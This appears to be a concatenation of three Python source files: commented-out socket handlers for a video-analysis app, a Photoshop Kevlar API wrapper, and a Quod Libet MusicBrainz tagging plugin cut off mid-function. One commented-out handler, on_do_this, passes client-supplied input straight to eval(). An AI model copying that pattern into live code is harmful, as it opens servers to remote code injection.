# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# video.shot_state = Compute_state.IN_PROGRESS
# video.save()
# shots_detection.detect(video)
# if(video.shot_boundaries_ground_truth != []):
# shots_detection.evaluate(video)
# shots_detection.take_thumbnails(video)
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('refresh',{"id":video.id})
# video.features_state = Compute_state.IN_PROGRESS
# video.save()
#
# dataset.compute_features(video,overwrite)
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('refresh',{"id":video.id})
# video.arousal_state = Compute_state.IN_PROGRESS
# video.save()
#
# dataset.model_arousal(video,overwrite)
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('refresh',{"id":video.id})
# self.broadcast_event('end')
#
# @namespace('/videoprocessorsocket')
# class VideoProcessorSocketNamespace(BaseNamespace, RoomsMixin, BroadcastMixin):
# def initialize(self):
# self.logger = logging.getLogger("videoprocessorsocket")
# self.log("Socketio session on videoprocessorsocket started")
#
# def log(self, message):
# self.logger.info("[{0}] {1}".format(self.socket.sessid, message))
#
# # def on_shot_dataset(self,params):
# #
# # algos = params['algos']
# # name = params['name']
# # base_path = params['base_path']
# # videos = []
# #
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # for video in dataset.videos.all():
# # videos.append(video)
# # t = Thread(target=shot_vids,args=(self,videos,dataset,algos))
# # t.start()
# # self.log(params)
# # return True
# #
# #
# # def on_shot_video(self,params):
# # self.log(params)
# # algos = params['algos']
# #
# # for x in algos:
# # self.log(x['key'])
# # self.log(x['value'])
# # videos = []
# # video = Video.objects.get(id=params['id'])
# # name = params['name']
# # base_path = params['base_path']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # videos.append(video)
# # t = Thread(target=shot_vids,args=(self,videos,dataset,algos))
# # t.start()
# # self.log(params)
# # return True
# #
# def on_evaluate_video(self,params):
# video = params['video']
# video = Video.objects.get(id=video['id'])
# res = VideoShotsResult.objects.filter(video=video)
# shots = []
# for x in res:
# shots.append(x.shots_detection)
# t = Thread(target=evaluate ,args=(self,shots,video))
# t.start()
# return True
#
# @namespace('/datasetsocket')
# class DatasetNamespace(BaseNamespace, RoomsMixin, BroadcastMixin):
# def initialize(self):
# self.logger = logging.getLogger("datasetsocket")
# self.log("Socketio session on datasetsocket started")
#
# def log(self, message):
# self.logger.info("[{0}] {1}".format(self.socket.sessid, message))
#
# # def on_prepare_dataset(self,params):
# # self.log("prepare_dataset")
# # self.log("Nom {0} Path: {1}".format(params['name'],params['base_path']))
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # overwrite_audio = params['overwrite_audio']
# # update = params['update']
# # dataset, created = Dataset.objects.get_or_create(name=name, base_path=base_path)
# # self.log(dataset.base_path)
# # self.log(dataset.audio_path)
# # self.log(dataset.video_path)
# # videos = dataset.prepare()
# # self.log("videos number {0}".format(len(videos)))
# # videos = []
# # for vid in dataset.videos.all():
# # videos.append(vid)
# # t = Thread(target=pre_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio))
# # t.start()
# # self.log("Videos name's")
# # self.log(dataset.videos_name_in_folder)
# # self.log(params)
# # return True
#
# def on_get_videos_in_dataset(self,params):
# name = params['name']
# dataset = Dataset.objects.get(name=name)
# videos = dataset.video_list
# for vid in videos:
# dataset.create_video(vid)
# self.broadcast_event('list videos',{})
# return True
#
# # def on_prepare_video(self,params):
# # self.log(params)
# # videos = []
# # video = Video.objects.get(id=params['id'])
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # overwrite_audio = params['overwrite_audio']
# # update = params['update']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # videos.append(video)
# # t = Thread(target=pre_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio))
# # t.start()
# # self.log(params)
# # return True
#
# # def on_feature_video(self,params):
# # self.log(params)
# # videos = []
# # video = Video.objects.get(id=params['id'])
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # videos.append(video)
# # t = Thread(target=feature_vids,args=(self,videos,dataset,overwrite))
# # t.start()
# # self.log(params)
# # return True
# #
# # def on_feature_dataset(self,params):
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # videos = []
# #
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# #
# # for video in dataset.videos.all():
# # videos.append(video)
# #
# # t = Thread(target=feature_vids,args=(self,videos,dataset,overwrite))
# # t.start()
# # self.log(params)
# # return True
#
# def on_arousal_video(self,params):
# self.log(params)
# videos = []
# video = Video.objects.get(id=params['id'])
# name = params['name']
# base_path = params['base_path']
# overwrite = params['overwrite']
# algos = ""
# overwrite_audio = ""
# update = ""
# dataset = Dataset.objects.get(name=name, base_path=base_path)
# videos.append(video)
# try:
# window_len = int(params['windowlen'])
# wsize = int(params['wsize'])
# wstep = int(params['wstep'])
# crest_intensity_threshold = float(params['crest_intensity_threshold'])
# beta = int(params['beta'])
# t = Thread(target=arousal_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio,algos,window_len,wsize,wstep,crest_intensity_threshold,beta))
# except:
# t = Thread(target=arousal_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio,algos))
#
# t.start()
# self.log(params)
# return True
# #
# # def on_arousal_dataset(self,params):
# # name = params['name']
# # base_path = params['base_path']
# # videos = []
# # overwrite = params['overwrite']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# #
# #
# # for video in dataset.videos.all():
# # videos.append(video)
# #
# # t = Thread(target=arousal_vids,args=(self,videos,dataset,overwrite))
# # t.start()
# # # self.log(params)
# # return True
#
# #
# # def on_all_video(self,params):
# # self.log(params)
# # videos = []
# # video = Video.objects.get(id=params['id'])
# # algos = params['algos']
# # name = params['name']
# # base_path = params['base_path']
# # overwrite = params['overwrite']
# # overwrite_audio = params['overwrite_audio']
# # update = params['update']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # videos.append(video)
# # t = Thread(target=all_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio,algos))
# # t.start()
# # return True
# #
# # def on_all_dataset(self,params):
# # name = params['name']
# # base_path = params['base_path']
# # videos = []
# # overwrite = params['overwrite']
# # overwrite_audio = params['overwrite_audio']
# # update = params['update']
# # algos = params['algos']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# #
# #
# #
# # for video in dataset.videos.all():
# # videos.append(video)
# #
# # t = Thread(target=all_vids,args=(self,videos,dataset,update,overwrite,overwrite_audio,algos))
# # t.start()
# # self.log(params)
# # return True
#
# def on_do_this(self,params):
# self.log(params)
# videos = []
#
# algos = params['algos']
# name = params['name']
# base_path = params['base_path']
# overwrite = params['overwrite']
# overwrite_audio = params['overwrite_audio']
# update = params['update']
# dataset = Dataset.objects.get(name=name, base_path=base_path)
# if(params['id'] == -1):
# for video in dataset.videos.all():
# videos.append(video)
# else:
# video = Video.objects.get(id=params['id'])
# videos.append(video)
# t = Thread(target=eval(params['function']),args=(self,videos,dataset,update,overwrite,overwrite_audio,algos))
# t.start()
# return True
|
api.py
|
"""
Kevlar API wrappers.
https://github.com/adobe-photoshop/generator-core/wiki/Photoshop-Kevlar-API-Additions-for-Generator
"""
import json
import threading
from enum import Enum
from photoshop.protocol import ContentType
import logging
logger = logging.getLogger(__name__)
class Event(str, Enum):
"""
List of events in :py:meth:`~photoshop.PhotoshopConnection.subscribe`.
See `Kevlar API`_.
.. _Kevlar API: https://github.com/adobe-photoshop/generator-core/wiki/Photoshop-Kevlar-API-Additions-for-Generator).
"""
imageChanged = 'imageChanged'
generatorMenuChanged = 'generatorMenuChanged'
generatorDocActivated = 'generatorDocActivated'
foregroundColorChanged = 'foregroundColorChanged'
backgroundColorChanged = 'backgroundColorChanged'
currentDocumentChanged = 'currentDocumentChanged'
activeViewChanged = 'activeViewChanged'
newDocumentViewCreated = 'newDocumentViewCreated'
closedDocument = 'closedDocument'
documentChanged = 'documentChanged'
colorSettingsChanged = 'colorSettingsChanged'
keyboardShortcutsChanged = 'keyboardShortcutsChanged'
quickMaskStateChanged = 'quickMaskStateChanged'
toolChanged = 'toolChanged'
workspaceChanged = 'workspaceChanged'
Asrt = 'Asrt'
idle = 'idle'
def listen_event(self, event, callback):
event = Event(event)
begin = self._render('networkEventSubscribe.js.j2', dict(event=event))
with self._transaction() as txn:
txn.send(ContentType.SCRIPT_SHARED, begin.encode('utf-8'))
try:
while True:
response = txn.receive()
data = response.get('body')
if data == b'[ActionDescriptor]':
continue
data = data.split(b'\r', 1)
assert data[0].decode('utf-8') == event
result = callback(self, data[1] if len(data) else None)
if result:
break
except Exception as e:
if not isinstance(e, OSError):
logger.error('%s' % e)
return
end = self._render('networkEventUnsubscribe.js.j2', dict(event=event))
with self._transaction() as txn:
txn.send(ContentType.SCRIPT_SHARED, end.encode('utf-8'))
assert txn.receive().get('body') == b'[ActionDescriptor]'
class Kevlar(object):
"""Kevlar API wrappers."""
def subscribe(self, event, callback, block=False, **kwargs):
"""
Subscribe to changes, sends any relevant change info back on subscribing
socket.
:param event: Event name, one of :py:class:`~photoshop.Event`.
:param callback: Callable that takes two arguments:
- `conn`: :py:class:`~photoshop.PhotoshopConnection` instance.
- `data`: `bytes` data returned from Photoshop on this event. The
actual data format varies by event type.
Return value of `callback` signals termination of the current
subscription. If `callback` returns True, subscription stops.
:param block: Block until subscription finishes. default `False`.
Example::
import json
import time
def handler(conn, data):
print(json.loads(data.decode('utf-8')))
return True # This terminates subscription
with PhotoshopConnection() as conn:
conn.subscribe('imageChanged', handler)
conn.execute('documents.add()')
time.sleep(5)
"""
assert callable(callback)
thread = threading.Thread(
target=listen_event, args=(self, event, callback), daemon=True
)
self.subscribers.append(thread)
thread.start()
if block:
thread.join()
def get_document_thumbnail(
self,
document=None,
max_width=2048,
max_height=2048,
format=1,
placed_ids=None
):
"""
Send a thumbnail of a document's composite.
:param document: optional document id, uses active doc if not specified.
:param max_width: maximum width of thumbnail.
:param max_height: maximum height of thumbnail.
:param format: 1 is JPEG, 2 is pixmap (uncompressed w/ transparency).
:param placed_ids: Photoshop 16.1 and later, optional. reference smart
object(s) within the document series of "ID" from
layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:return: JPEG bytes if `format` is 1, or
:py:class:`~photoshop.protocol.Pixmap` if `format` is 2.
:raise RuntimeError: if error happens in remote.
"""
script = self._render(
'sendDocumentThumbnailToNetworkClient.js.j2', locals()
)
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.IMAGE
return response.get('body', {}).get('data')
def get_layer_thumbnail(
self,
document=None,
max_width=2048,
max_height=2048,
convert_rgb_profile=True,
icc_profile=None,
interpolation=None,
transform=None,
layer=None,
layer_settings=None,
image_settings=None,
include_layers=None,
clip_bounds=None,
bounds=False,
bounds_only=False,
thread=None,
layer_comp_id=None,
layer_comp_index=None,
dither=True,
color_dither=True
):
"""
Send a thumbnail of layer composite, or a range of layers, with optional
settings/transform applied.
:param document: optional document id, uses active doc if not specified.
:param max_width: maximum width of thumbnail.
:param max_height: maximum height of thumbnail.
:param placed_ids: Photoshop 16.1 and later, optional. reference smart
object(s) within the document series of "ID" from
layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:param convert_rgb_profile: if True, the thumbnail is converted to the
working RGB space in "Color Settings...".
:param icc_profile: optional, Photoshop 16.1, and later.
convert to profile with this name, e.g. srgb is "sRGB IEC61966-2.1"
:param interpolation: interpolation method to use for any downscaling
necessary to fit into requested "width"/"height".
supported interpolation types (from image size dialog/action):
- "nearestNeighbor"
- "bilinear"
- "bicubic"
- "bicubicSmoother"
- "bicubicSharper"
- "bicubicAutomatic"
- "preserveDetailsUpscale"
- "automaticInterpolation"
default is "bicubicSharper".
:param transform: scale/transform layers by this before building
thumbnails (scales original source data, such as smart obj/vectors).
if this is specified, the thumbnail is built on a worker thread in
Photoshop.
Example::
transform = {
'scale_x': 100.0,
'scale_y': 100.0,
'interpolation': 'bicubicSharper',
'dumb_scaling': True
}
- `scale_x`: percent, 100.0 == 1x
- `scale_y`: percent, 100.0 == 1x
- `interpolation`: Optional, similar to interpolation above,
but this is just used for the transform step (not the thumbnail),
it defaults to Photoshop's "Image Interpolation" preference.
- `dumb_scaling`: For PS >= 14.2. Make smart shapes scale like
non-smart shapes (round rect corners will scale), default is
False.
:param layer: `None` for currently selected layers in photoshop, or
specify one of the following:
- integer ID of a single layer, e.g. `0`.
- (`first`, `last`) tuple of layer IDs, e.g., (1, 6).
:param document: optional document id, uses active doc if not specified
:param layer_settings: Action list to modify the layer before the
thumbnail is retrieved. This option is available when `layer` param
is specified by tuple range. The argument should be list of dict
with the following keys:
- `enabled`: make the layer visible/invisible.
- `blendOptions`: blending settings to use.
- `layerEffects`: fx settings to use.
- `offset`: integer offset of layer in dict.
- `vectorMask`: vector mask to apply in dict.
- `FXRefPoint`: effect reference point.
Example::
[
{
'enabled': True,
'blendOptions': [],
'layerEffects': [],
'offset': {
'horizontal': 0,
'vertical': 0
},
'vectorMask': {
'enabled': False,
'offset': {
}
'invert': False,
},
'FXRefPoint': {
'horizontal': 0,
'vertical': 0
}
}
]
:param image_settings:
:param include_layers: include additional layers to the requested layer.
dict with one or more of the following keys.
- `adjustors`: adjustors above the layer, default is `visible`.
- `ancestors`: enclosing groups (includes group blending, fx, masks
), default is `all`. `visible` and `all` incorporate any blending
parameters/masks of the ancestor groups. `visible` returns an
empty thumbnail for any layer inside an invisible group. `none`
substitutes default groups for any groups around the layer.
- `children`: if layer is a group (includes group blending, fx,
masks), default is `visible`.
- `clipbase`: clip base if layer is clipped. The clip base is a
layer that a clipped layer is clipped to, default is `all`.
- `clipped`: clipped layers if layer is clip base, default is
`visible`.
Values are one of `'all'`, `'none'`, or `'visible'`.
- `all`: include all layers of this type (force them visible).
- `none`: include no layers of this type.
- `visible`: include visible layers of this type.
Example::
{
'adjustors': 'none',
'children': 'all',
}
:param clip_bounds: clip the layer thumbnail to the document canvas
bounds if specified. Can specify `True` to bound to document size,
or specify tuple of (`top`, `left`, `right`, `bottom`).
:param bounds: return the thumbnail bounds as JSON on same transaction.
(default is False).
:param bounds_only: Just return the thumbnail bounds as JSON on same
transaction. (no thumbnail data) (default is false).
:param thread: build the thumbnail on a thread. By default, the
thumbnail is threaded if there is a "transform", otherwise it is
done on the main thread unless a user event occurs, then it is
cancelled, and restarted on a thread `thread` can be used to
override the default (either force the thumb to be started on the
main thread or a background thread) it may help performance if you
know that the thumbnail is either quick (best done on main thread)
or slow (best done on background) there is a slight
memory/performance penalty for threading in that the layer data
must be copied before it is threaded.
:param layer_comp_id: layer comp id to use (this comp is temporarily
applied before getting thumbnail).
:param layer_comp_index: layer comp index to use (this comp is
temporarily applied before getting thumbnail).
:param dither: 15.0 and later. If
1) `dither` is true
2) and either `color_dither` is false, or `dither` is
checked in the global color settings (Color Settings... in
Photoshop)
3) and any color/depth conversion would be “lossy” (16 to 8 bit,
CMYK to RGB, etc),
then dithering will occur, otherwise there will be no dithering.
:param color_dither: see above.
:return: :py:class:`~photoshop.protocol.Pixmap` or `None`.
:raise RuntimeError: if error happens in remote.
.. note:: "interpolation", "transform", "bounds", "boundsOnly", and
"thread" are supported in background-only (layer-less) documents
but only in version 15.0 and later. "layerID" should be 0 in that
case. The other layer-related settings are ignored as there are no
layers.
.. warning:: if `layer` tuple range includes a group layer, it must
include the corresponding hidden "divider" layer at the bottom of
the group (and vice-versa). The range can also just include layers
inside a group with no group layers at all.
"""
script = self._render(
'sendLayerThumbnailToNetworkClient.js.j2', locals()
)
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.IMAGE
return response.get('body', {}).get('data')
def get_layer_shape(
self, document=None, layer=None, version='1.0.0', placed_ids=None
):
"""
Return path/fill/strokeStyle for a shape layer(s).
:param document: optional document id, uses active doc if not specified.
:param placed_ids: Photoshop 16.1 and later, optional. reference smart
object(s) within the document series of "ID" from
layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:param layer: `None` for currently selected layers in photoshop, or
specify one of the following:
- integer ID of a single layer, e.g. `0`.
- (`first`, `last`) tuple of layer IDs, e.g., (1, 6).
:param version: format version. Valid versions are 1.0.0 in 14.1, and
1.0, 1.0.0, 1.1, or 1.1.0 in Photoshop 14.2
:return: `dict` of the following schema, or `None` if no valid layer is
specified.
Schema:
.. code-block:: none
{"path":
{"pathComponents": // arrays of paths to be filled and boolean operators
[{"shapeOperation": ("intersect"/"add"/"subtract"/"xor")
"subpathListKey":[ //list of subpath objects that make up the component
{"closedSubpath":true, // (if subpath is closed)
"points": [{" // array of knot objects (anchor and control points)
anchor:[x,y] //point on path
forward:[x1,y1] //forward bezier control
backward:[x2,y2] //backward bezier control
}, //next knot...
...]
"origin":{"origin": ("ellipse"/"rect"/"roundedrect"/"line"/"unknown")
"radii": [r1,r2,r3,r4], //radii for rounded rect if any
"bounds":["top":top,"left":left,"right":right,"bottom":bottom], //bounds of entire path
"defaultFill":true/false}, //whether path starts out filled or not
"fill":
{"color":{"red":red,"green":green,"blue":blue},"class":"solidColorLayer"}
//or
{"gradient":{(gradient object)},"class":"gradientLayer"}
//or
{"pattern":{(pattern object)},"class":"patternLayer"}
"strokeStyle":
{(strokeStyle object)}
}
Example::
{"path":{"pathComponents":
[{"shapeOperation":"add",
"subpathListKey":[
{"closedSubpath":true,
"points": [{"anchor":[234.5,36],"forward":[307.125,36],"backward":[161.875,36]},
{"anchor":[366,167],"forward":[366,239.349],"backward":[366,94.651]},
{"anchor":[234.5,298],"forward":[161.875,298],"backward":[307.125,298]},
{"anchor":[103,167],"forward":[103,94.651],"backward":[103,239.349]}]
}],
"origin":{"origin":"ellipse","bounds":[35,102,299,367]}
}],
"bounds":[35,102,299,367],
"defaultFill":false},
"fill":{"color":{"red":0,"green":0,"blue":0},"class":"solidColorLayer"}
}
:raise RuntimeError: if error happens in remote.
"""
script = self._render('sendLayerShapeToNetworkClient.js.j2', locals())
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.SCRIPT
return json.loads(response.get('body', b'{}').decode('utf-8'))
def get_document_info(
self,
version=None,
document=None,
placed_ids=None,
layer=None,
expand_smart_objects=False,
get_text_styles=False,
get_full_text_styles=False,
get_default_layer_effect=False,
get_comp_layer_settings=False,
get_path_data=False,
image_info=None,
comp_info=None,
layer_info=True,
include_ancestors=True
):
"""
Return complete document info in JSON format.
:param version: optional requested version (you always get the current
version back, but this does a sanity check, and errors on an
incompatible version). Example: '1.4.0'.
:param document: optional document id, uses active doc if not specified.
:param placed_ids: Photoshop 16.1 and later, optional. reference smart
object(s) within the document series of "ID" from
layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:param layer: `None` for all layers in photoshop, or
specify one of the following:
- integer ID of a single layer, e.g. `0`.
- (`first`, `last`) tuple of layer IDs, e.g., (1, 6).
- `'selected'` for currently selected layers.
:param expand_smart_objects: default is false, recursively get doc info
for any smart objects. can be slow.
:param get_text_styles: default is false, return more detailed text
info. can be slow.
:param get_full_text_styles: default is false, return all text
information (getTextStyles must also be true).
:param get_default_layer_effect: default is false, return all layer fx
even if they are disabled.
:param get_comp_layer_settings: default is false, enumerate layer
settings in layer comps.
:param get_path_data: default is false, return path control points for
shapes.
:param image_info: return image-wide info (size, resolution etc.),
default is `layer` != 'selected'.
:param comp_info: return comp info in "comps" array, default is true,
default is `layer` != 'selected'.
:param layer_info: return layer info in "layers" array, default is true.
:param include_ancestors: 16.1 and later, include surrounding layer
groups if doing selected layers/range/single layer id. default is
true. should only be used with single layers (otherwise grouping
may not be accurate).
:return: `dict`.
:raise RuntimeError: if error happens in remote.
"""
# TODO: Implement whichInfo option.
script = self._render(
'sendDocumentInfoToNetworkClient.js.j2', locals()
)
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.SCRIPT
return json.loads(response.get('body', b'{}').decode('utf-8'))
def get_document_stream(
self,
document=None,
placed_ids=None,
placed_id=None,
layer=None,
position=None,
size=None,
path_only=None
):
"""
Get the file info and file stream for a smart object.
:param document: optional document id, uses active doc if not specified.
:param placed_ids: Photoshop 16.1 and later, optional. reference smart
object(s) within the document series of "ID" from
layer:smartObject:{} or "placedID" from "image:placed:[{}]".
:param placed_id: return file for smart object with this placed id ("ID"
from layer:smartObject:{} or "placedID" from "image:placed:[{}]").
:param layer: when integer ID of a single layer is specified, e.g. `0`,
return file for smart object with this layer id. When `placed_id` is
`None` and layer is also `None`, return placed smart object stream
the selected layers
:param position: offset into file (defaults to 0).
:param size: number of bytes to return (defaults to all bytes).
:param path_only: instead of returning the file stream back over the
wire, write it to a file local to the server, and return the path as
a string argument in the JSON part of the FileStream Reply.
:return: `dict` with the following fields:
- `mimeFormat`: mime string.
- `position` : position of file data returned.
- `size` : number of file bytes returned.
- `fullSize` : total number of bytes in file.
- `path` : string, server-local path to file if path was set to true
in the request).
- `data`: actual data in bytes. if `path` is True, this is empty.
:raise RuntimeError: if error happens in remote.
.. note:: The maximum size returned by PS is 2 GB, if you have a smart
object bigger than 2 GB, you need to use the position/size format.
To return chunks, or the path format to write it to a temp file.
Document stream/attributes are returned as a FileStream Reply.
"""
script = self._render(
'sendDocumentStreamToNetworkClient.js.j2', locals()
)
response = self.execute(script, receive_output=True)
assert response['content_type'] == ContentType.FILE_STREAM
return response.get('body')
|
brainz.py
|
# brainz.py - Quod Libet plugin to tag files from MusicBrainz automatically
# Copyright 2005-2010 Joshua Kwan <joshk@triplehelix.org>,
# Michael Ball <michael.ball@gmail.com>,
# Steven Robertson <steven@strobe.cc>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation
import os
import re
import threading
import time
from gi.repository import Gtk, GObject, Pango, GLib
try:
from musicbrainz2 import webservice as ws
from musicbrainz2.utils import extractUuid
except ImportError as e:
from quodlibet import plugins
raise (plugins.MissingModulePluginException("musicbrainz2") if
hasattr(plugins, "MissingModulePluginException") else e)
from quodlibet import config, util
from quodlibet.qltk.ccb import ConfigCheckButton
from quodlibet.plugins.songsmenu import SongsMenuPlugin
from quodlibet.qltk.views import HintedTreeView, MultiDragTreeView
VARIOUS_ARTISTS_ARTISTID = '89ad4ac3-39f7-470e-963a-56509c546377'
def get_artist(album):
"""Returns a single artist likely to be the MB AlbumArtist, or None."""
for tag in ["albumartist", "artist", "performer"]:
names = set()
for song in album:
for single in filter(None, song.get(tag, "").split("\n")):
names.add(single)
if len(names) == 1:
return names.pop()
elif len(names) > 1:
return None
return None
def get_trackcount(album):
"""Returns the track count, hammered into submission."""
parts = []
for song in album:
parts.extend(song.get("tracknumber", "0").split("/"))
max_count = len(album)
for part in parts:
try:
tracks = int(part)
except ValueError:
continue
max_count = max(max_count, tracks)
return max_count
def config_get(key, default=''):
return config.getboolean('plugins', 'brainz_' + key, default)
def dialog_get_widget_for_stockid(dialog, stockid):
for child in dialog.get_action_area().get_children():
if child.get_label() == stockid:
return child
class ResultTreeView(HintedTreeView, MultiDragTreeView):
"""The result treeview. The model only stores local tracks; info about
remote results is pulled from self.remote_album."""
def __name_datafunc(self, col, cell, model, itr, data):
song = model[itr][0]
if song:
cell.set_property('text', os.path.basename(song.get("~filename")))
else:
cell.set_property('text', '')
def __track_datafunc(self, col, cell, model, itr, data):
idx = model.get_path(itr)[0]
if idx >= len(self.remote_album):
cell.set_property('text', '')
else:
cell.set_property('text', str(idx + 1))
def __title_datafunc(self, col, cell, model, itr, data):
idx = model.get_path(itr)[0]
if idx >= len(self.remote_album):
cell.set_property('text', '')
else:
cell.set_property('text', self.remote_album[idx].title)
def __artist_datafunc(self, col, cell, model, itr, data):
idx = model.get_path(itr)[0]
if idx >= len(self.remote_album) or not self.remote_album[idx].artist:
cell.set_property('text', '')
else:
cell.set_property('text', self.remote_album[idx].artist.name)
def __init__(self, album):
self.album = album
self.remote_album = []
self.model = Gtk.ListStore(object)
for song in album:
self.model.append([song])
super(ResultTreeView, self).__init__(self.model)
self.set_headers_clickable(True)
self.set_rules_hint(True)
self.set_reorderable(True)
self.get_selection().set_mode(Gtk.SelectionMode.MULTIPLE)
cols = [
('Filename', self.__name_datafunc, True),
('Track', self.__track_datafunc, False),
('Title', self.__title_datafunc, True),
('Artist', self.__artist_datafunc, True),
]
for title, func, resize in cols:
render = Gtk.CellRendererText()
render.set_property('ellipsize', Pango.EllipsizeMode.END)
col = Gtk.TreeViewColumn(title, render)
col.set_cell_data_func(render, func)
col.set_resizable(resize)
col.set_expand(resize)
self.append_column(col)
def update_remote_album(self, remote_album):
"""Updates the TreeView, handling results with a different number of
tracks than the album being tagged."""
for i in range(len(self.model), len(remote_album)):
self.model.append((None, ))
for i in range(len(self.model), len(remote_album), -1):
if self.model[-1][0] is not None:
break
itr = self.model.get_iter_from_string(str(len(self.model) - 1))
self.model.remove(itr)
self.remote_album = remote_album
has_artists = bool(filter(lambda t: t.artist, remote_album))
col = self.get_column(3)
# sometimes gets called after the treeview is already gone
if not col:
return
col.set_visible(has_artists)
self.columns_autosize()
self.queue_draw()
class ResultComboBox(Gtk.ComboBox):
"""Formatted picker for different Result entries."""
def __init__(self, model):
super(ResultComboBox, self).__init__(model=model)
render = Gtk.CellRendererText()
render.set_fixed_height_from_font(2)
def celldata(layout, cell, model, iter, data):
release = model[iter][0]
if not release:
return
date = release.getEarliestReleaseDate()
if date:
date = '%s, ' % date
else:
date = ''
markup = "<b>%s</b>\n%s - %s%s tracks" % (
util.escape(release.title),
util.escape(release.artist.name),
date, release.tracksCount)
cell.set_property('markup', markup)
self.pack_start(render, True)
self.set_cell_data_func(render, celldata, None)
class ReleaseEventComboBox(Gtk.HBox):
"""A ComboBox for picking a release event."""
def __init__(self):
super(ReleaseEventComboBox, self).__init__()
self.model = Gtk.ListStore(object, str)
self.combo = Gtk.ComboBox(model=self.model)
render = Gtk.CellRendererText()
self.combo.pack_start(render, True)
self.combo.add_attribute(render, "markup", 1)
self.combo.set_sensitive(False)
self.label = Gtk.Label(label="_Release:", use_underline=True)
self.label.set_use_underline(True)
self.label.set_mnemonic_widget(self.combo)
self.pack_start(self.label, False, True, 0)
self.pack_start(self.combo, True, True, 0)
def update(self, release):
self.model.clear()
events = release.getReleaseEvents()
# The catalog number is the most important of these fields, as it's
# the source for the 'labelid' tag, which we'll use until MB NGS is
# up and running to deal with multi-disc albums properly. We sort to
# find the earliest release with a catalog number.
events.sort(key=lambda e: (bool(not e.getCatalogNumber()),
e.getDate() or '9999-12-31'))
for rel_event in events:
text = '%s %s: <b>%s</b> <i>(%s)</i>' % (
rel_event.getDate() or '', rel_event.getLabel() or '',
rel_event.getCatalogNumber(), rel_event.getCountry())
self.model.append((rel_event, text))
if len(events) > 0:
self.combo.set_active(0)
self.combo.set_sensitive((len(events) > 0))
text = ngettext("%d _release:", "%d _releases:", len(events))
self.label.set_text(text % len(events))
self.label.set_use_underline(True)
def get_release_event(self):
itr = self.combo.get_active_iter()
if itr:
return self.model[itr][0]
else:
return None
class QueryThread(object):
"""Daemon thread which does HTTP retries and avoids flooding."""
def __init__(self):
self.running = True
self.queue = []
thread = threading.Thread(target=self.__run)
thread.daemon = True
thread.start()
def add(self, callback, func, *args, **kwargs):
"""Add a func to be evaluated in a background thread.
Callback will be called with the result from the main thread."""
self.queue.append((callback, func, args, kwargs))
def stop(self):
"""Stop the background thread."""
self.running = False
def __run(self):
while self.running:
if self.queue:
callback, func, args, kwargs = self.queue.pop(0)
try:
res = func(*args, **kwargs)
except:
time.sleep(2)
try:
res = func(*args, **kwargs)
except:
res = None
def idle_check(cb, res):
if self.running:
cb(res)
GLib.idle_add(idle_check, callback, res)
time.sleep(1)
class SearchWindow(Gtk.Dialog):
def __save(self, widget=None, response=None):
"""Writes values to Song objects."""
self._qthread.stop()
if response != Gtk.ResponseType.ACCEPT:
self.destroy()
return
album = self.current_release
shared = {}
shared['album'] = album.title
if config_get('split_disc', True):
m = re.match(r'(.*) \(disc (.*?)\)$', album.title)
if m:
shared['album'] = m.group(1)
disc = m.group(2).split(': ', 1)
shared['discnumber'] = disc[0]
if len(disc) > 1:
shared['discsubtitle'] = disc[1]
relevt = self.release_combo.get_release_event()
shared['date'] = relevt and relevt.getDate() or ''
if shared['date'] and config_get('year_only', False):
shared['date'] = shared['date'].split('-')[0]
if config_get('labelid', True):
if relevt and relevt.getCatalogNumber():
shared['labelid'] = relevt.getCatalogNumber()
if not album.isSingleArtistRelease():
if (config_get('albumartist', True)
and extractUuid(album.artist.id) != VARIOUS_ARTISTS_ARTISTID):
shared['albumartist'] = album.artist.name
if config_get('artist_sort', False) and \
album.artist.sortName != album.artist.name:
shared['albumartistsort'] = album.artist.sortName
if config_get('standard', True):
shared['musicbrainz_albumartistid'] = extractUuid(album.artist.id)
shared['musicbrainz_albumid'] = extractUuid(album.id)
for idx, (song, ) in enumerate(self.result_treeview.model):
if song is None:
continue
song.update(shared)
if idx >= len(album.tracks):
continue
track = album.tracks[idx]
song['title'] = track.title
song['tracknumber'] = '%d/%d' % (idx + 1,
max(len(album.tracks), len(self.result_treeview.model)))
if config_get('standard', True):
song['musicbrainz_trackid'] = extractUuid(track.id)
if album.isSingleArtistRelease() or not track.artist:
song['artist'] = album.artist.name
if config_get('artist_sort', False) and \
album.artist.sortName != album.artist.name:
song['artistsort'] = album.artist.sortName
else:
song['artist'] = track.artist.name
if config_get('artist_sort', False) and \
track.artist.sortName != track.artist.name:
song['artistsort'] = track.artist.sortName
if config_get('standard', True):
song['musicbrainz_artistid'] = extractUuid(track.artist.id)
if config_get('split_feat', False):
